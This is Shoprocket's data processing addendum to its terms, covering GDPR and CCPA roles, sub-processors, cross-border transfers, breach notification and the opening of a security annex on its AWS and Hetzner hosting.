Shoprocket Data Processing Addendum
Last Updated: 30th August 2022
This Shoprocket Data Processing Addendum (“Addendum”) amends the Shoprocket Terms & Conditions (the “Agreement”) by and between you (as defined below) and Shoprocket LTD, a private company limited by shares incorporated and registered in England and Wales with company number 12656598 and registered office address at 20-22 Wenlock Road, London, N1 7GU, United Kingdom of Great Britain and Northern Ireland (“Shoprocket”).
Please note that where you have contracted with Shoprocket according to a separate Service Level Agreement (“SLA”), rather than the Shoprocket Terms & Conditions, this Addendum is made under and amends the terms of the SLA, and any reference to the Agreement shall be deemed to be a reference to the SLA.
This Addendum is subject to the terms of the Agreement and is incorporated into the Agreement. Capitalised terms that are not defined within this Addendum have the meaning given to them in the Agreement.
- Definitions

| Term | Meaning |
| --- | --- |
| Account Settings | means the configurations and settings associated with your Shoprocket Account, including any controls, security features and functionalities that allow you to manage how Shoprocket processes Personal Data. |
| Business Purposes | means the Services to be provided by Shoprocket to you as defined in the Agreement. |
| Client Account Data | means Personal Data that relates to your relationship with Shoprocket, including the names or contact information of individuals authorised by you to access your Shoprocket Account and any billing information associated with these individuals. Your Client Account Data also includes any data Shoprocket may need to collect for the purposes of managing our relationship with you, conducting identity verification, or as otherwise required by applicable laws and regulations. |
| Client Usage Data | means Service usage data collected and processed by Shoprocket in connection with your use of the Services, including without limitation data used to identify the source and destination of a communication, activity logs, and data used to optimise and maintain performance of the Services, and to prevent system abuse. |
| Data Protection Legislation | means any applicable laws and regulations in any relevant jurisdiction relating to the use or processing of Personal Data including: (i) the California Consumer Privacy Act 2018 (“CCPA”); (ii) the General Data Protection Regulation ((EU) 2016/679) (“EU GDPR”); (iii) the Swiss Federal Act on Data Protection; (iv) the EU GDPR as it forms part of the law of England and Wales, Scotland and Northern Ireland by virtue of section 3(10) (as supplemented by section 205(4)) of the Data Protection Act 2018 (“UK GDPR”); (v) the Data Protection Act 2018 (and regulations made thereunder) (“DPA 2018”); and (vi) the Privacy and Electronic Communications Regulations 2003 (SI 2003/2426) as amended (“PECR 2003”); in each case, as updated, amended or replaced from time to time. The terms “Data Controller”, “Data Processor”, “Data Subject”, “Data Subject Request”, “Personal Data”, “Personal Data Breach”, “Processing”, “Subprocessor”, and “Supervisory Authority” shall have the meanings set forth in the EU GDPR. |
| EEA | means the European Economic Area. |
| EU SCCs | means the standard contractual clauses approved by the European Commission in Commission Decision 2021/914 dated 4 June 2021, for transfers of Personal Data to countries not otherwise recognised as offering an adequate level of protection for Personal Data by the European Commission within the meaning of Article 45 GDPR (as amended and updated from time to time). |
| Ex-EEA Transfer | means the transfer of Personal Data, which is processed in accordance with the EU GDPR, to a server, network, computing system, undertaking, person or premise located outside of the EEA, where such transfer is not governed by an adequacy decision made by the European Commission in accordance with Article 45 EU GDPR. |
| Ex-UK Transfer | means the transfer of Personal Data, which is processed in accordance with the UK GDPR and the Data Protection Act 2018, to a server, network, computing system, undertaking, person or premise located outside the UK, where such transfer is not governed by an adequacy decision by the UK Secretary of State in accordance with the relevant provisions of the UK GDPR and the Data Protection Act 2018. |
| Service Provider | shall have the meaning given in the California Consumer Privacy Act of 2018 (“CCPA”). |
| Services | means those tools provided by Shoprocket that allow merchants to build and customise online stores, sell in multiple places (including web, mobile, social media, online marketplaces and other locations) (“Shoprocket Store”), manage products, inventory, payments, fulfilment, shipping, business operations, marketing and advertising, and engage with existing and potential companies, and any tool or service marketed by Shoprocket from time to time. |
| Shoprocket Account | means a user account provisioned by Shoprocket that provides access to the Services and allows you to manage your Account Settings. The Shoprocket Account is accessible (without limitation) on https://www.shoprocket.io. |
| Shoprocket Privacy Policy | means the fair processing information notice made available by Shoprocket at https://shoprocket.io/privacy, as amended, substituted and/or supplemented from time to time. |
| Shoprocket Store | means your ecommerce presence as hosted or facilitated by Shoprocket as part of the Services. |
| Special Category Data | has the meanings given in Articles 4(13), 4(14), 4(15) and 9 of the EU GDPR and UK GDPR (as applicable). |
| Standard Contractual Clauses (SCCs) | means the EU SCCs and UK SCCs, as applicable. |
| UK SCCs | means the EU SCCs as revised and amended by the UK ICO’s International Data Transfer Addendum to EU Commission Standard Contractual Clauses (“IDTA Addendum”). |
| We/Us/Our | means Shoprocket LTD trading as “Shoprocket” and “Shoprocket.io”. |
| You/Your | means the contractual party named in the Agreement. |

- Customer Instructions
  - Shoprocket and you agree that this Addendum and the Agreement (including any instructions you provide as to how Shoprocket may process Personal Data as part of your Account Settings) constitute your written documented instructions regarding Shoprocket’s processing of Personal Data (the “Documented Instructions”). Shoprocket will process the Personal Data only in accordance with the Documented Instructions. Additional instructions outside the scope of the Documented Instructions (if any) require prior written agreement between Shoprocket and you, including agreement on additional fees payable by you to Shoprocket for carrying out such instructions.
  - Shoprocket is entitled to terminate this Addendum and the Agreement without incurring any liability to you if Shoprocket declines to follow instructions that contravene the Data Protection Legislation or are outside the scope of, or changed from, those given or agreed to be given in this Addendum or in any other written agreement between the parties.
  - Taking into account the nature of the processing, you agree that it is unlikely that Shoprocket can form an opinion on whether the Documented Instructions infringe the Data Protection Legislation. If Shoprocket forms such an opinion, it will immediately inform you, in which case you will be entitled to withdraw or modify your Documented Instructions.
- Data Processing
  - When Shoprocket Processes Personal Data in the course of providing the Services, Shoprocket will:
    - except for Client Account Data and Client Usage Data, process the Personal Data we collect on your behalf or pursuant to your use of the Services, insofar as the UK GDPR or EU GDPR applies, as a Data Processor and, insofar as the CCPA applies, as a Service Provider;
    - process as an independent Data Controller the Personal Data we collect directly from any customers of your Shoprocket Store(s);
    - process and store Personal Data only on servers:
      - operated by the cloud service provider Amazon Web Services (“AWS”) within the AWS “eu-west-1” data centre region located in Ireland, or such other servers operated by AWS within the EEA;
      - operated by the cloud service provider Hetzner (“Hetzner”) at its data centres in Nuremberg and Falkenstein in Germany;
    - only process the Personal Data to the extent, and in such a manner, as is necessary for the Business Purposes in accordance with your written instructions (provided such instructions are commensurate with the functionalities of the Services purchased by you under the Agreement), and will not process the Personal Data for any other purpose or in a way that does not comply with this Addendum or the Data Protection Legislation (including where, in Shoprocket’s reasonable opinion, your written instructions do not comply with this Addendum or the Data Protection Legislation);
    - if Shoprocket is required by law to process the Personal Data for any other purpose, Shoprocket will provide you with notice of this requirement prior to conducting any such processing, unless Shoprocket is prohibited by law from providing such notice;
    - promptly comply with any written instructions you provide requiring Shoprocket to amend, transfer, delete or otherwise process the Personal Data, or to stop, mitigate or remedy any unauthorised processing;
    - maintain the confidentiality of the Personal Data and not disclose the Personal Data to third parties unless you or this Addendum specifically authorise the disclosure, or as required by domestic law, court or regulation (including any instruction of the UK Information Commissioner or any other competent authority);
    - reasonably assist you, at no additional expense to you, with meeting your compliance obligations under the Data Protection Legislation, taking into account the nature of Shoprocket’s processing and the information available to Shoprocket, including for illustrative purposes but not limited to, providing you with reasonable information to help you complete any data protection impact assessments you conduct, and assisting you to respond to data subject requests; and
    - promptly notify you of any changes to the Data Protection Legislation that may be reasonably interpreted as adversely affecting Shoprocket’s performance of the Agreement or this Addendum.
  - Shoprocket’s role as a Data Controller. The parties acknowledge and agree that with respect to the Client Account Data and Client Usage Data, Shoprocket is an independent Data Controller, not a joint controller with you. Shoprocket will process Client Account Data and Client Usage Data as a Data Controller (i) to manage its relationship with you; (ii) to carry out Shoprocket’s core business operations, such as accounting, audits, tax preparation and filing and compliance purposes; (iii) to monitor, investigate, prevent and detect fraud, security incidents and other misuse of the Services, and to prevent harm to you; (iv) for identity verification purposes; (v) to comply with legal or regulatory obligations applicable to the processing and retention of Personal Data to which Shoprocket is subject; and (vi) as otherwise permitted under the Data Protection Legislation and in accordance with this Addendum and the Agreement. Shoprocket may also process the Client Usage Data as a Data Controller to provide, optimise and maintain the Services, to the extent permitted by the Data Protection Legislation. Any processing by Shoprocket as a Data Controller shall be in accordance with the Shoprocket Privacy Policy.
  - CCPA. Except with respect to the Client Account Data and the Client Usage Data, the parties acknowledge and agree that Shoprocket is a Service Provider for the purposes of the CCPA (to the extent it applies) and is receiving personal information from you in order to provide the Services pursuant to the Agreement, which constitutes a business purpose. Shoprocket shall not sell any such personal information. Shoprocket shall not retain, use or disclose any personal information provided by you pursuant to the Agreement except as necessary for the specific purpose of performing the Services for you pursuant to this Agreement, or otherwise as set forth in this Agreement or permitted in the CCPA. The terms “personal information”, “Service Provider”, “sale”, and “sell” shall have the meaning given in Section 1798.140 of the CCPA (as amended, re-enacted or updated from time to time). Shoprocket certifies that it understands the restrictions of this clause 3.2.
  - Add-ons. As part of the Services, Shoprocket offers you the opportunity to integrate your Shoprocket-powered store or website with certain third-party add-ons, integrations and applications (“Add-Ons”). Please note that your use of the Add-Ons shall in each case be governed exclusively by the terms and conditions of the applicable end user licence agreement and accompanying privacy policies (together the “EULA”) included within the Add-On by its publisher (the “Add-On Publisher”). Each EULA is made exclusively by and between you and the Add-On Publisher, and Shoprocket is not party to such EULAs.
  - Where you instruct us to integrate your Shoprocket products or accounts with one or more Add-Ons, you agree that Shoprocket shall transfer your Personal Data to the Add-On Publishers so that they may provide their services to you. Where Add-On Publishers subsequently process your Personal Data, this shall be governed by the relevant privacy provisions within their EULA, and Shoprocket is not responsible for such processing.
  - Add-Ons from the following Add-On Publishers are currently marketed on Shoprocket.

| Name (click for Privacy Policy) | Description |
| --- | --- |
| Amazon, eBay, Facebook Marketplace, Google Shopping, Instagram Shopping | eCommerce integration option that allows you to undertake multi-channel fulfilment order placement, provide up-to-date tracking information to your customers and sync your inventory levels. |
| Affirm, Afterpay, AliPay, Apple Pay, Click to Pay, GrabPay, GooglePay, iDEAL, Klarna, Microsoft Pay, PayPal, Przelewy24 (P24), Sofort, Stripe, WeChat Pay | Payment processing integration that allows you to take multi-currency payment through 30+ payment methods such as credit/debit card, bank account transfer, credit, voucher, EPS, FPX and others. |
| Zapier | Shoprocket’s Zapier integration allows you to automate data transfers and workflows between and across Shoprocket and your other web applications. |

  - Please note that where Shoprocket allows you to integrate your Shoprocket Store or Shoprocket Account with an Add-On that is not named in the table above, such as where you integrate your chosen accounting software, CRM platform or shipping rate price aggregator with any of the Services, your use of any such Add-On shall be governed by the applicable EULA as in clause 3.2 of this Agreement.
  - SCCs. If Shoprocket and you have entered into Standard Contractual Clauses as described in clause 10 (Transfers of Personal Data), (i) your instruction for Shoprocket under clause 3.4 of this Agreement to integrate the Add-On(s) (as applicable) as part of the Services will constitute your prior written consent to the transfer of Personal Data by Shoprocket to the Add-On Publishers if such consent is required under the SCCs; (ii) the parties agree that the copies of the agreements with Add-On Publishers that must be provided by Shoprocket to you pursuant to Clause 9(c) of the EU SCCs or any relevant clause of the UK SCCs (as applicable) may have commercial information, or information unrelated to the Standard Contractual Clauses or their equivalent, removed by Shoprocket beforehand, and that such redacted copies will be provided by Shoprocket only upon your written request.
  - Your responsibilities. When Shoprocket processes Personal Data in the course of providing the Services, you shall:
    - be the Data Controller in respect of any Personal Data Shoprocket collects on your behalf or pursuant to your use of the Services;
    - remain responsible for your compliance obligations under the applicable Data Protection Legislation, including but not limited to providing any required notices and obtaining any required consents in respect of which Shoprocket may process the Personal Data to fulfil the Business Purposes.
- Personal Data Types and Processing Purposes
  - Subject Matter. The subject matter of the data processing under this Addendum is the Personal Data uploaded onto the Services, your Shoprocket Account and your Shoprocket Store.
  - Duration. As between Shoprocket and you, it is you who determines the duration of the data processing under this Addendum. You may suspend or terminate the data processing by suspending or terminating your Shoprocket subscription or suspending any Shoprocket-hosted integrations (such as any proprietary API that Shoprocket makes available to you) that you use as part of your business.
  - Purpose. The purpose of the data processing under this Addendum is the provision of the Services initiated by you from time to time, including for illustrative purposes the provision of your Shoprocket Store and Shoprocket Account.
  - Nature of the processing. Shoprocket allows users to build, customise and run online ecommerce stores, including providing the “Services” as defined in clause 1 of this Addendum. These Services include the processing of Personal Data by Shoprocket, its Sub-processors and, as applicable, the Add-On Publishers on systems that may contain Personal Data.
  - Types of Personal Data. Personal Data uploaded to the Services, including by way of your Shoprocket Account, Shoprocket Store and any proprietary integrations that Shoprocket makes available that interface with your systems.
  - Categories of Data Subjects. The Data Subjects could include you, your customers, employees, contractors, agents, suppliers and vendors.
- Security of Data Processing
  - Shoprocket shall at all times implement appropriate technical and organisational measures against unauthorised or unlawful processing, access, copying, modification, reproduction, display or distribution of the Personal Data, and against accidental or unlawful loss, destruction, alteration, disclosure or damage of the Personal Data including, but not limited to, the measures described in the Shoprocket Security Standards (Annex A), in each case to ensure a level of security of the Personal Data appropriate to the risk in accordance with Article 32 EU/UK GDPR.
  - Shoprocket shall implement such measures to ensure a level of security appropriate to the risk involved, including as appropriate:
    - the pseudonymisation and encryption of Personal Data;
    - the ability to ensure the ongoing confidentiality, integrity, availability and resilience of processing systems and services;
    - the ability to restore the availability and access to Personal Data in a timely manner in the event of a physical or technical incident; and
    - a process for regularly testing, assessing and evaluating the effectiveness of the security measures.
- Shoprocket’s Employees
  - Shoprocket will ensure its employees, contractors and agents:
    - are informed of the confidential nature of the Personal Data and are bound by confidentiality obligations and use restrictions in respect of the Personal Data;
    - have undertaken training on the Data Protection Legislation relating to handling Personal Data and how it applies to their particular duties; and
    - are aware both of Shoprocket’s duties and their personal duties and obligations under the Data Protection Legislation and the Agreement.
- Security
  - Shoprocket shall at all times implement appropriate technical and organisational measures against unauthorised or unlawful processing, access, copying, modification, reproduction, display or distribution of the Personal Data, and against accidental or unlawful loss, destruction, alteration, disclosure or damage of Personal Data.
  - Shoprocket shall implement such measures to ensure a level of security appropriate to the risk involved, including for illustrative purposes and as appropriate:
    - the pseudonymisation and encryption of Personal Data;
    - the ability to ensure the ongoing confidentiality, integrity, availability and resilience of processing systems and services;
    - the ability to restore the availability and access to Personal Data in a timely manner in the event of a physical or technical incident; and
    - a process for regularly testing, assessing and evaluating the effectiveness of the security measures.
- Personal Data Breach
  - Shoprocket shall within 72 hours and in any event without undue delay notify you if it becomes aware of:
    - the loss, unintended destruction or damage, corruption or other impairment of part or all of the Personal Data;
    - any accidental, unauthorised or unlawful processing of the Personal Data; or
    - any Personal Data Breach.
  - Where Shoprocket becomes aware of any of the foregoing matters described in clauses 8.1(a), (b) and/or (c) above, it shall, without undue delay, also provide you with the following:
    - a description of the nature of the matter recorded in relation to clauses 8.1(a), (b) and/or (c), including the categories of in-scope Personal Data and the approximate number of both Data Subjects and Personal Data records concerned; and
    - a description of the measures taken or proposed to be taken to address the matters recorded in relation to clauses 8.1(a), (b) and/or (c), including measures to mitigate its possible adverse effects.
  - Immediately following any accidental, unauthorised or unlawful Personal Data processing or Personal Data Breach, Shoprocket will contact you so that we can co-ordinate our investigation of the matter.
  - Shoprocket will not inform any third party of any accidental, unauthorised or unlawful processing of all or part of the Personal Data and/or a Personal Data Breach without first obtaining your written consent, except where such disclosure is necessary as part of the measures needed to address such processing or Personal Data Breach or where such disclosure is required by applicable law.
  - Shoprocket will cover reasonable expenses associated with the performance of its obligations under clauses 8.1 and 8.2 unless the matter arose as a result of your specific written instructions, negligence, wilful default or breach of the Addendum or Agreement, in which case you will cover all reasonable expenses (including Shoprocket’s reasonable expenses and those of its professional advisers).
- Sub-processors
  - Shoprocket uses the following Sub-processors to host and/or process your data and Personal Data, to provide infrastructure and network services to support Shoprocket, and to perform service functions on our behalf as part of the Services:

| Name | Description | Location |
| --- | --- | --- |
| 200OK LLC | Trading as “Profitwell,” 200OK LLC provides Shoprocket with subscription reporting and analytics services. | MA, USA. |
| Amazon Web Services EMEA SARL | Amazon provides Shoprocket with cloud hosting, computing and storage services. | Luxembourg, EU. |
| Automattic, Inc. | Trading as “Gravatar.” Automattic allows Shoprocket users to upload their pre-existing image and public profile data to the Shoprocket account. | CA, USA. |
| Cloudflare, Inc. | Cloudflare provides network security and connectivity services to Shoprocket. | CA, USA. |
| Crisp IM SAS | Shoprocket uses Crisp IM’s live chat and customer messaging application as part of the Services so as to provide customer support to users. | France, EU. |
| Facebook Technologies Ireland Limited | Shoprocket uses Facebook Pixels to track conversions from Facebook ads, to optimise ads and to build targeted audiences for its Services. | Ireland, EU. |
| Google Ireland Limited | Google Ireland provides (a) its Google Analytics user behaviour analytics services to Shoprocket; (b) its Adwords advertising placement and monetisation services to Shoprocket. | Ireland, EU. |
| GmbH | provides Shoprocket with cloud hosting, computing and storage services. | Germany, EU. |
| TPS Unlimited, Inc. | Trading as “Taxjar,” TPS Unlimited, Inc. provides tax automation integrations that Shoprocket uses to automate calculation and invoicing of EU VAT and US sales taxes on Shoprocket Stores. | CA, USA. |
| Twilio, Inc. | Trading as “Sendgrid,” Twilio, Inc. provides a multi-channel customer messaging and engagement service that Shoprocket uses to communicate with actual and potential customers via email, SMS and WhatsApp messaging. | Ireland, EU. |
| Twitter, Inc. | Shoprocket uses Twitter’s Twitter Pixel integration, a conversion tracking website tag that allows Shoprocket to measure the performance of its advertisement campaigns by tracking clickthrough and engagement patterns of users who see Shoprocket’s ads. | CA, USA. |

  - You authorise us to use the Sub-processors listed in clause 9.1 above as part of the Services, and further provide us with general authorisation to use other Sub-processors to provide processing activities with regard to Personal Data we collect from you under the Agreement (“Authorised Sub-processors”). At least 30 days before Shoprocket engages a new Sub-processor, Shoprocket will update this Addendum and provide you with a mechanism to obtain notice of that update, such as publishing an information notice on the Shoprocket.io website, sending you an email notification or providing a notification on your Shoprocket Account. You may object to such an engagement by informing Shoprocket within 10 days of receipt of the aforementioned notice from Shoprocket, provided such objection is in writing and based on reasonable grounds relating to data protection. You acknowledge that certain Sub-processors are essential to providing the Services and that objecting to the use of a Sub-processor may prevent Shoprocket from offering part or all of the Services to you.
  - If you reasonably object to an engagement in accordance with clause 9.2, and Shoprocket cannot provide a commercially reasonable alternative that is reasonably acceptable to you within 90 days, you may discontinue use of the affected Service(s) and/or terminate the Agreement by providing written notice to Shoprocket. Discontinuation or termination shall not relieve you of your obligation to pay any fees owed to Shoprocket under this Agreement.
  - If you do not object to the engagement of a third party as a Sub-processor in accordance with clause 9.2 within 10 days of notice by Shoprocket, that third party will be deemed an Authorised Sub-processor for the purposes of the Agreement.
  - Where Shoprocket engages an Authorised Sub-processor as described in clause 9.2:
    - Shoprocket will restrict the Authorised Sub-processor’s access to any data only to what is reasonably necessary to provide, maintain or improve the Services;
    - Shoprocket will enter into a written agreement with the Authorised Sub-processor, and to the extent that the Sub-processor performs the same data processing services as provided by Shoprocket under this Addendum, Shoprocket will impose on the Authorised Sub-processor the same contractual obligations that Shoprocket has herein; and
    - Shoprocket will remain responsible for its compliance with the obligations of this Addendum, and for any acts or omissions of the Authorised Sub-processor that cause Shoprocket to breach its obligations under this Addendum.
  - If Shoprocket and you have entered into Standard Contractual Clauses as described in clause 10 (Transfers of Personal Data), (i) the above authorisations will constitute your prior written consent to the subcontracting by Shoprocket of the processing of Personal Data if such consent is required under the SCCs; (ii) the parties agree that the copies of the agreements with Authorised Sub-processors that must be provided by Shoprocket to you pursuant to Clause 9(c) of the EU SCCs or any relevant clause of the UK SCCs (as applicable) may have commercial information, or information unrelated to the Standard Contractual Clauses or their equivalent, removed by Shoprocket beforehand, and that such redacted copies will be provided by Shoprocket only upon your written request.
- Transfers of Personal Data
- The parties agree that Shoprocket may transfer Personal Data processed under this Agreement outside the EEA, the UK, or Switzerland as necessary to provide the Services. You acknowledge that the processing operations of many of the Add-Ons Publishers and Authorised Sub-processors take place in the United States, and the transfer of your Personal Data is necessary for the provision of the Services to you. If Shoprocket transfers Personal Data protected under this Agreement to a jurisdiction for which the European Commission or UK Secretary of State (as applicable) has not issued an adequacy decision, Shoprocket will ensure that appropriate safeguards have been implemented for the transfer of Personal Data in accordance with the Data Protection Legislation.
- Ex-EEA Transfers. The parties agree that ex-EEA Transfers are made pursuant to the EEU SCCs which are deemed entered into (and incorporated into this Addendum) as follows:
- Module One (Controller to Controller) of the EU SCCs apply when Shoprocket is processing Personal Data as a Data Controller pursuant to clause 3.2 of this Addendum;
- Module Two (Controller to Processor) of the EU SCCs apply when you are a Data Controller and Shoprocket is processing Personal Data for you as a Data Processor pursuant to clause 3 of this Addendum.
- For each Module, where applicable the following applies (and unless stated otherwise, references to clause numbers are references to clause numbers of the Modules):
- The optional docking clause in Clause 7 does not apply;
- In Clause 9, Option 2 (general written authorisation) applies, and the minimum time period for prior notice of Sub-processor changes shall be as set forth in clause 9.2 of this Addendum;
- In Clause 11, the optional language does not apply;
- All square brackets in Clause 12 are hereby removed;
- In Clause 17 (Option 10, the EU SCCs will be governed by Irish law;
- In Clause 18(b), disputes will be resolved before the courts of Ireland;
- Part 1 of Annex B (“Cross-Border Transfers”) to this Addendum contains the information required in Annex I of the EU SCCs;
- Part 1 of Annex B (“Cross-Border Transfers”) to this Addendum contains the information required in Annex II of the EU SCCs;
- By entering into this Addendum, the parties are deemed to have signed the EU SCCs incorporated herein, including their Annexes.
- Ex-UK Transfers.
- The parties agree that the IDTA Addendum shall apply to an ex-UK Transfer. Part 2 of Annex B (“Cross-Border Transfers”) contains the information required in the IDTA Addendum.
- Transfers from Switzerland. The parties agree that transfers from Switzerland are made pursuant to the EU SCCs with the following modifications:
- The terms “General Data Protection Regulation” or “Regulation (EU) 2016/679” as utilised in the EU SCCs shall be interpreted to include the Federal Act on Data Protection of 19 June 2022 (the “FADP”), and as revised as of 25 September 2020, the “ Revised FADP”) with respect to data transfers subject to FADP.
- The terms of the EU SCCs shall be interpreted to protect the data of legal entities until effective under the Revised FADP.
- Clause 13 of the EU SCCs is modified to provide that the Federal Data Protection and Information Commissioner (“ FDPIC”) of Switzerland shall have authority over data transfers governed by the FADP and the appropriate EU Supervisory Authority shall have authority over data transfers governed by the EU GDPR. Subject to the foregoing, all other requirements of Clause 13 of the EU SCCs shall be observed.
- The term “EU Member State” as utilised in the EU SCCs shall not be interpreted in such a way to exclude the Data Subjects in Switzerland from exercising their rights in their place of habitual residence in accordance with Clause 18(c) of the EU SCCs.
- Supplementary Measures. In respect of any ex-EEA Transfer or ex-UK Transfer, the following supplementary measures shall apply:
- As of the date of this Addendum, the Data Importer has not received any formal legal requests from any government intelligence or security service/agencies in the country to which the Personal Data is being exported, for access to (or copies of) your Personal Data ( “Government Agency Requests”);
- If, after the date of this Addendum, the Data Importer receives any Government Agency Requests, Shoprocket shall attempt to redirect the law enforcement or government agency to request the data directly from you. As part of this effort, you agree that we may provide your basic contact information to the government agency. If compelled to disclose your Personal Data to a law enforcement or government agency, Shoprocket shall give you reasonable notice of the demand and cooperate to allow you to seek a protective order or other appropriate remedy, unless Shoprocket is legally prohibited from doing so. Shoprocket shall not voluntarily disclose Personal Data to any law enforcement or government agency. Shoprocket shall (as soon as reasonably practicable) discuss and determine whether all or any of the transfers of Personal Data pursuant to this Addendum should be suspended in light of any such Government Agency Requests;
- Shoprocket and the Data Exporter will meet regularly to consider whether:
- The protection afforded by the laws of the country of the Data Importer to data subjects whose Personal Data is being transferred is sufficient to provide broadly equivalent protection to that afforded in the EEA or UK, whichever the case may be;
- Additional measures are reasonably necessary to enable the transfer to be compliant with the Data Protection Legislation;
- It is still appropriate for Personal Data to be transferred to the relevant Data Importer, taking into account all relevant information available to the parties, together with guidance provided by the Supervisory Authorities.
- If the Data Protection Laws require Shoprocket to execute the Standard Contractual Clauses applicable to a particular transfer of Personal Data to a Data Importer as a separate agreement, the Data Importer shall, on request of Shoprocket, promptly execute such Standard Contractual Clauses incorporating such amendments as may reasonably be required by Shoprocket to reflect the applicable annexes, the details of the transfer and the requirements of the Data Protection Legislation; and
- If either (i) any of the means of legitimising transfers outside of the EEA, UK or Switzerland set forth in this Addendum ceases to be valid; or (ii) any Supervisory Authority requires transfers of Personal Data pursuant to those means to be suspended, then the Data Importer may by notice to Shoprocket, with effect from the date set out in such notice, amend or put in place alternative arrangements in respect of such transfers, as required by Data Protection Legislation.
- Sub-processors. Where you consent to our appointment of a Sub-processor located outside of the EEA in compliance with the provisions of clause 9, or where you elect to integrate an Add-on from an Add-On Publisher outside the EEA in accordance with clause 3, you authorise us to enter into SCCs with that party, including in your name and on your behalf.
- Complaints, Data Subject Requests and Third Party Rights
- Shoprocket will take such reasonable technical and organisational measures as appropriate, and promptly provide such information to you as you may require, to enable you to comply with:
- the rights of Data Subjects under the Data Protection Legislation, including subject access rights, the rights to rectify, port and erase personal data, object to the processing and automated processing of personal data, and restrict the processing of personal data; and
- information or assessment notices served on you by the UK ICO (or any other relevant regulator) under the Data Protection Legislation.
- Shoprocket will notify you immediately in writing if it receives any complaint, notice or communication that relates directly or indirectly to the processing of the Personal Data or to either Shoprocket’s or your compliance with the Data Protection Legislation.
- Shoprocket will notify you within 14 days if it receives a request from a Data Subject for access to their Personal Data or to exercise any of their other rights under the Data Protection Legislation.
- Shoprocket will give you its assistance in responding to any complaint, notice, communication or Data Subject request.
- Shoprocket will not disclose the Personal Data to any Data Subject or to a third party other than in accordance with your written instructions, or as required by domestic law.
- Term and termination
- This Addendum will remain in full force and effect so long as:
- the Agreement remains in effect; or
- Shoprocket retains any of the Personal Data related to the Agreement in its possession or control (the “ Term”).
- Any provision of this DPA that expressly or by implication should come into or continue in force on or after termination of the Agreement in order to protect the Personal Data will remain in full force and effect.
- Shoprocket’s failure to comply with the terms of this DPA is a material breach of the Agreement. In such event, you may terminate the Agreement effective immediately on written notice to Shoprocket without incurring further liability or obligation.
- If a change in any Data Protection Legislation prevents either party from fulfilling all or part of its Agreement obligations, the parties may agree to suspend the processing of the Personal Data until that processing complies with the new requirements. If the parties are unable to bring the Personal Data processing into compliance with the Data Protection Legislation within 90 days, either party may terminate the Agreement with immediate effect on written notice to the other party.
- Data Return and Destruction
- At your request, Shoprocket will give you, or a third party nominated in writing by you, a copy of or access to all or part of the Personal Data in its possession or control in the format and on the media reasonably specified by you.
- On termination or expiry of the Agreement for any reason, or upon completion of the Services, Shoprocket shall return or delete your Personal Data, unless further storage of Personal Data is required or authorised by applicable law. If return or destruction is impracticable or prohibited by law, rule or regulation, Shoprocket shall take measures to block such Personal Data from any further processing (except to the extent necessary for its continued hosting or processing required by law, rule or regulation) and shall continue to appropriately protect the Personal Data remaining in its possession, custody or control. If Shoprocket and you have entered into Standard Contractual Clauses as described in clause 10 (Transfers of Personal Data), the parties agree that the certification of deletion that is required under Clause 8.1(d) of the EU SCCs and any applicable provision of the UK SCCs (as applicable) shall be provided by Shoprocket to you only upon your written request.
- If any law, regulation, or government or regulatory body requires for Shoprocket to retain any documents or materials or Personal Data that Shoprocket would otherwise be required to return or destroy, it will notify you in writing of that retention requirement, giving details of the documents, materials or Personal Data that it must retain, the legal basis for retention, and establishing a specific timeline for deletion or destruction once the retention requirement ends.
- Shoprocket will certify in writing to you that it has destroyed the Personal Data within 30 days after it completes the deletion or destruction.
- Records
- Shoprocket will keep detailed, accurate and up-to-date written records regarding any processing of the Personal Data, including but not limited to, the access, control and security of the Personal Data, approved subcontractors, the processing purposes, categories of processing, any transfers of personal data to a third country and related safeguards, and a general description of the technical and organisational security measures implemented (the “Records”).
- Shoprocket will ensure that the Records are sufficient to enable you to verify Shoprocket’s compliance with its obligations under this Agreement and Shoprocket will provide you with copies of the Records upon request.
- Warranties
- Shoprocket warrants and represents that:
- its employees, subcontractors, agents and any other person or persons accessing the Personal Data on its behalf are reliable and trustworthy and have received the required training on the Data Protection Legislation;
- it and anyone operating on its behalf will process the Personal Data in compliance with the Data Protection Legislation and other laws, enactments, regulations, orders, standards and other similar instruments;
- it has no reason to believe that the Data Protection Legislation prevents it from providing any of the Agreement's contracted services; and
- considering the current technology environment and implementation costs, it will take appropriate technical and organisational measures to prevent the unauthorised or unlawful processing of Personal Data and the accidental loss or destruction of, or damage to, Personal Data, in compliance with all applicable Data Protection Legislation and its own information security policies, and will ensure a level of security appropriate to:
- the harm that might result from such unauthorised or unlawful processing or accidental loss, destruction or damage; and
- the nature of the Personal Data protected.
- Execution and Modifications
- The terms of this Addendum are incorporated by reference into the Agreement and are made a part thereof as though fully set forth in the Agreement. By executing the Agreement, you expressly acknowledge and agree that you shall be bound by the terms of this Addendum.
- Shoprocket may, upon presenting thirty (30) calendar days’ prior written notice, make any reasonable variations to this Addendum as required as a result of any change in, or decision of a competent authority under, the Data Protection Legislation, to allow processing of Personal Data to be made (or continue to be made) without breach of the Data Protection Legislation. In the event that you do not agree to any such variations then you may, within such thirty (30) calendar days’ notice period, present written notice to Shoprocket to terminate the Agreement (including this Addendum) with immediate effect to the extent that it relates to the Services which are affected by the proposed variations (or lack thereof). You shall pay Shoprocket all fees and other sums that were incurred under or in connection with the Agreement before the date of termination and which remain unpaid as of the date of termination. You shall have no further claims (including requesting refunds for the Services) as a result of or in connection with the termination of this Agreement pursuant to this clause 16.2.
Annex A
Shoprocket Security Standards
Capitalised terms not otherwise defined herein have the meanings assigned to them in the addendum.
This Annex A addresses the technical and organisational measures, including practical safeguards and technical security measures, that Shoprocket maintains so as to (a) secure the Personal Data against accidental or unlawful loss, access or disclosure; (b) identify reasonably foreseeable and internal risks to security and unauthorised access to the Services, including your Shoprocket account; and (c) minimise security risks, including through risk assessment and regular testing. Shoprocket will designate one or more employees to be accountable for and respond to any questions on the information security practices and measures described below.
- Shared Responsibility Model
Shoprocket is a cloud-based application whose infrastructure and associated data are hosted on servers operated by the cloud service providers (1) Amazon Web Services (“AWS”) in data centres located in the AWS eu-west-1 region in Ireland and (2) Hetzner Online (“Hetzner Online”) in data centres located in Falkenstein, Germany. The Shoprocket Service is therefore delivered over the internet according to a Software as a Service (“SaaS”) model.
As between AWS and Hetzner Online, AWS hosts the Shoprocket application, its platform, infrastructure and portions of the associated data, and provides the computing power that allows you to access the Services without the need to physically install a copy of Shoprocket’s e-commerce software. For its part, Hetzner Online provides Shoprocket with a dedicated server on which Shoprocket stores certain data associated with the Services, principally image, digital download, log and invoice data.
